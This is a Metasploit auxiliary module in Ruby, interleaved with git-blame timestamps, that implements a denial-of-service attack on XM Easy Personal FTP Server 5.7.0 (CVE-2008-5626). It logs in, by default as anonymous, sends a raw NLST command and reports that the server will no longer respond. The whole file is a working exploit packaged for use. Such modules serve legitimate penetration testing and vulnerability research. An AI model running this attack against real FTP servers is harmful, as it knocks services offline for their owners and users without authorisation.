2009-04-07 18:26:19 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-04-07 18:26:19 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2009-04-07 18:26:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::Ftp
|
|
|
|
include Msf::Auxiliary::Dos
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
|
|
|
|
'Description' => %q{
|
|
|
|
You need a valid login to DoS this FTP server, but
|
|
|
|
even anonymous can do it as long as it has permission
|
|
|
|
to call NLST.
|
|
|
|
},
|
|
|
|
'Author' => 'kris katterjohn',
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' => [
|
|
|
|
[ 'CVE', '2008-5626'],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '50837'],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'EDB', '8294' ]
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Mar 27 2009')
|
|
|
|
)
|
|
|
|
|
|
|
|
# They're required
|
|
|
|
register_options([
|
|
|
|
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
|
|
|
|
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
|
|
|
|
])
|
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
return unless connect_login
|
|
|
|
|
|
|
|
raw_send("NLST\r\n")
|
|
|
|
|
|
|
|
disconnect
|
|
|
|
|
|
|
|
print_status("OK, server may still be technically listening, but it won't respond")
|
|
|
|
end
|
2009-04-07 18:26:19 +00:00
|
|
|
end
|